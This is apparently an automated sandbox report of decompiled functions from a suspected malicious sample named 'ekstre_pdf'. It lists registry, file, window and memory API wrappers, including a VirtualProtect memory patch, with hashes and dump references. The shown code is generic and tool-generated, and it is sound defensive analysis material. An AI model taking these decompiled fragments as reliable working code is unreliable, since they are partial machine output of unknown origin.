Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063e2
0x004063eb
0x00406401
0x00000000
0x00406401
0x004063ef
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,00430220,000000FF,00430220,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 6ED61A4A Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6ed65014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6ed6501c, 4, 0x40, 0x6ed65034); // executed
					 *0x6ed6501c = 0xc2;
					 *0x6ed65034 = 0;
					 *0x6ed65030 = 0;
					 *0x6ed6502c = 0;
					 *0x6ed65028 = 0;
					 *0x6ed65024 = 0;
					 *0x6ed65020 = 0;
					 *0x6ed6501e = 0;
				}
				return 1;
			}

0x6ed61a53
0x6ed61a58
0x6ed61a68
0x6ed61a70
0x6ed61a77
0x6ed61a7d
0x6ed61a83
0x6ed61a89
0x6ed61a8f
0x6ed61a95
0x6ed61a9b
0x6ed61a9b
0x6ed61aa4

APIs

VirtualProtect.KERNEL32(6ED6501C,00000004,00000040,6ED65034), ref: 6ED61A68

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8c54738180d59ac12901279418759079c468c38787a5a3abc168b875e7fa4f5c
Instruction ID: 64cc98d1efd58df092bb5762f81e48708c474fda36dec71ea173baffbcd03c79
Opcode Fuzzy Hash: 8c54738180d59ac12901279418759079c468c38787a5a3abc168b875e7fa4f5c
Instruction Fuzzy Hash: 6DF0AC70919B41EBEFA8CF9894546253BE0B71A345F004D3EF288DA346C330C1879BBA

Uniqueness

Uniqueness Score: -1.00%

Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023F4(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t17;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402DA6("true");
				 *(_t21 - 0x10) = E00402DA6(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x1fff, E00402DA6(0xffffffdd)); // executed
				_t24 =  *_t17 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t17 = __ebx;
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x004023f4
0x004023fb
0x004023fe
0x0040240e
0x00402425
0x0040242b
0x00401751
0x004028fc
0x00402903
0x00402903
0x00402c2d
0x00402c39

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00001FFF,00000000), ref: 00402425

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 6c343e9bda5d013119d51b0215e161b8434a5db911e864a73de97dea4c407bac
Instruction ID: 63e8f7b799cb3657af5f074fa60520448859c90a9d61b20944fb8e64719fc74d
Opcode Fuzzy Hash: 6c343e9bda5d013119d51b0215e161b8434a5db911e864a73de97dea4c407bac
Instruction Fuzzy Hash: 60E04F31C00229FADF10AFA0CD09EAD3668BF41340F14053AF510BB0D1E7FC89419789

Uniqueness

Uniqueness Score: -1.00%

Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063b4
0x004063bb
0x004063ce
0x00000000
0x004063ce
0x004063bf
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 99ed82fa4bcf374b5a68eaca435bf3956bd982e56737044eb8e3923ef71a2d01
Instruction ID: 485912becaa6d67509cbea28c7ccec90b0528c456c9d753676dc892a59da6128
Opcode Fuzzy Hash: 99ed82fa4bcf374b5a68eaca435bf3956bd982e56737044eb8e3923ef71a2d01
Instruction Fuzzy Hash: CAD017B2B08110DBDB11DBA8AA48B9D73A4AB50369B208537D111F61D0E6B8C955AA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x472ed8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044e5
0x004044ec
0x004044f7
0x00000000
0x004044f7
0x004044fd

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a848ec848152d250837050656b8650426fe539e8d9cbeb8de4a9ac882ea971dd
Instruction ID: de46e2b108a56ff2f9923173cd00d686b159caa5ccd6aed5cc0fbab4b2157d84
Opcode Fuzzy Hash: a848ec848152d250837050656b8650426fe539e8d9cbeb8de4a9ac882ea971dd
Instruction Fuzzy Hash: 22C09BB1740705BBDE10CB509E45F0777546750700F18C439F745F50D0CAB4E450D62C

Uniqueness

Uniqueness Score: -1.00%

Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x47af08, 0x28, _a4, "true"); // executed
				return _t2;
			}

0x004044dc
0x004044e2

APIs

SendMessageW.USER32(00000028,?,?,004042F9), ref: 004044DC

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 436347b04afcee8747146f770db761fdcd93cb05a9701baacbf876ce0845a114
Instruction ID: 2daf25a43cd67cbc70568e0265bb7e18aa3723e24192d1e297def45236f9ae1a
Opcode Fuzzy Hash: 436347b04afcee8747146f770db761fdcd93cb05a9701baacbf876ce0845a114
Instruction Fuzzy Hash: 88B01275181A00FBDE514B00DE09F4A7E62F7A4702F008438F345240F0CBB200F4DB09

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x450264, _a4); // executed
				return _t2;
			}

0x004044c5
0x004044cb

APIs

KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: ffa1bc83fb2a48ef9de27ae1e34a06a1c1f33a9bd0c9ea44ae4467c97942612f
Instruction ID: 560212355b268ea1067c641e5ed189811bece4663a6fcebfc2e9be34b6ece5ac
Opcode Fuzzy Hash: ffa1bc83fb2a48ef9de27ae1e34a06a1c1f33a9bd0c9ea44ae4467c97942612f
Instruction Fuzzy Hash: 82A002754046019BDE015B51DF0DD057B71A754701B014579B58550035CA314860EB1D

Uniqueness

Uniqueness Score: -1.00%

Function 6ED612F8 Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED612F8() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x6ed65040 +  *0x6ed65040); // executed
				return _t3;
			}

0x6ed61302
0x6ed61308

APIs

GlobalAlloc.KERNEL32(00000040,?,6ED611C4,-000000A0), ref: 6ED61302

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

